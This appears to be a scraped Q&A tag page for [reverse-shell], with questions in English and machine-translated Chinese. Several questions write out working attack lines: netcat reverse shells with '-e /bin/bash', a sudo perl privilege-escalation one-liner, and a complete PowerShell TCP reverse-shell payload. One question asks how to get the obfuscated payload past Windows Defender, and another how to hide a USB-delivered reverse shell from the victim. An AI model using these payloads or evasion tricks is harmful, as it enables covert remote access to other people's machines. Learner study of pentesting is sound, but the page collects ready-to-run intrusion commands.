问题标签 [reverse-shell]
For questions regarding programming in ECMAScript (JavaScript/JS) and its various dialects/implementations (excluding ActionScript). Note JavaScript is NOT the same as Java! Please include all relevant tags on your question; e.g., [node.js], [jquery], [json], [reactjs], [angular], [ember.js], [vue.js], [typescript], [svelte], etc.
linux - Using /bin/ in some pentest situations
During my Pentester learning, I have noticed a lot about using /bin/ in some situations and in certain commands, such as in a reverse shell:
nc -nv 192.168.0.6 1234 -e /bin/bash
and for example, when it comes to climbing privileges on a machine:
sudo /usr/bin/perl -e 'exec "/bin/sh"'
I tried to search the internet and watch several videos, but they never explain how this folder works in these situations, WHY I need to run /bin/bash at reverse shell time, or why /bin/perl and /bin/sh was used ?
android - 从 Android 设备反向/绑定 shell
我正在尝试从 Genymotion Android (8.0.0) 设备获取反向外壳。
我本地机器的IP:192.168.178.101
下面的命令,当从我的主机执行时,给了我一个 shell。
但是,当我直接从 android shell 执行此操作时,会出现以下错误。为什么?
从 android shell 内部获取反向 shell 的任何解决方法/不同方法?
c - 如何从 C 程序执行终端命令?
我正在用 C 创建一个反向 shell(仅供练习),但我不知道如何从我的 C 程序执行终端命令。我该怎么做呢?(我在 POSIX 系统上)(我想得到输出)
c - C recv 函数阻止循环在接收到所有内容后重复(sys/socket)
我正在开发一个反向外壳(用于练习),我正在尝试将 popen 函数的输出发送回服务器。出于某种原因,当我遍历文件并发送它时,(server recv)循环在停止接收消息时不会中断。谁能找到我的错误。并帮我修复它?服务器代码:
客户端代码:
sockets - How to interact with a reverse shell in Rust?
OpenBSD's Netcat implementation listens on a port with unix_bind()
... basically the same behavior as Rust's TcpListener::bind()
. Where I got lost in writing my listen
function (emulating nc -l -p <port>
) is how to interact with reverse shells.
As seemingly trivial as it sounds, I want listen
to give me the sh-3.2$
prompt like nc -l -p <port>
does. All the Netcat-Rust implementations I dug up online don't allow me to interact with reverse shells like that.
Reverse shell code (Machine 1): (adapted from this question I asked years ago)
Listening code (Machine 2):
There's a certain simplicity and elegance to Rust code that helps me understand succinctly what's going on, which is why I don't want to just copy the C code from Netcat.
python - subprocess.Popen 返回“shell-init:检索当前目录时出错”
我在 python 中创建了一个简单的反向 shell,subprocess.Popen(cmd, shell=True)
用于客户端运行命令。但是,当我在用户目录中使用命令时,我得到一个 shell-init 错误。这是我尝试使用时得到的ls
以 sudo 身份运行ls
命令不起作用。
值得一提的是,命令确实在用户目录之外的目录中按预期工作。
下面是调用该命令的代码:
c - 从 tcp 反向 shell 服务器收到无效响应
我将用 c 编程语言制作小型 tcp 反向 shell。服务器给你一个命令行来发送你的命令给客户端。
我想定义更改服务器受害者目录之间路径的能力,我使用了 _chdir() 函数。喜欢 'cd 下载
该功能运行良好,但在接收模式下发送服务器响应时会被阻止,直到受害者与服务器的连接断开。
服务器:(在 linux ubuntu 上编码/用 gcc 编译/在 linux 上运行)
客户端:(在 Windows 10 上编码/使用 Visual Studio 17 编译器编译/在 Windows 上运行)
linux - 隐藏没有屏幕的反向外壳终端
场景:攻击者将充当键盘的 USB 插入受害者的笔记本电脑。有效负载打开一个终端,执行反向 shell 并隐藏终端。
问题:我在本地进行的测试(ubuntu 19.04,和 digispark as usb)如下:
一
航站楼 Anc -e /bin/bash 10.10.10.10 8888
B航站楼nc -vlp 8888
一切正常,我的 shell 在终端 B 上有提示,但终端 A 没有隐藏。那么在这种情况下它是没有用的。
二
航站楼 Anc -e /bin/bash 10.10.10.10 8888&; disown; exit
B航站楼nc -vlp 8888
终端 B 只是挂起,终端 A 被隐藏。无用。
三
航站楼 Anohup nc -e /bin/bash 10.10.10.10 8888&; exit
B航站楼nc -vlp 8888
终端 B 只是挂起,终端 A 被隐藏
四
终端A:我打开screen
然后执行nc -e /bin/bash 10.10.10.10 8888
,CTRL^A
然后d
,最后exit
。
B航站楼nc -vlp 8888
使用screen
一切正常(终端 B 收到一个工作外壳,终端 A 不可见)但我不想使用屏幕,因为默认情况下它没有安装。
问题:有没有办法(使用预装工具)隐藏终端,screen
但效果相同?
powershell - powershell 反壳 AV 规避
我正在尝试在 Windows 10 上运行 powershell 反向 shell。无论如何,每次它都被 Wndows Defender 阻止。我怎样才能绕过它?
在一个文件中,我存储了有效负载$client = New-Object System.Net.Sockets.TCPClient('192.168.1.54',9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
然后我使用 xencrypt ( https://github.com/the-xentropy/xencrypt ) 来混淆代码但是当我运行powershell -NoP -NonI -W Hidden -Exec Bypass .\revshell.ps1
我明白了Questo script include contenuto dannoso ed è stato bloccato dal software antivirus.
In riga:18 car:1
+ IEX($piifnga)
+ ~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
问题: 有没有办法绕过这个检查?
shell - perl 命令行参数 -MIO 标志
你可以像这样创建一个 perl oneliner:
有人可以解释这是什么-MIO
意思吗?找不到任何有用的信息(在https://perldoc.perl.org/perl.html上有标志-I
和-M
,但这对我来说没有意义)。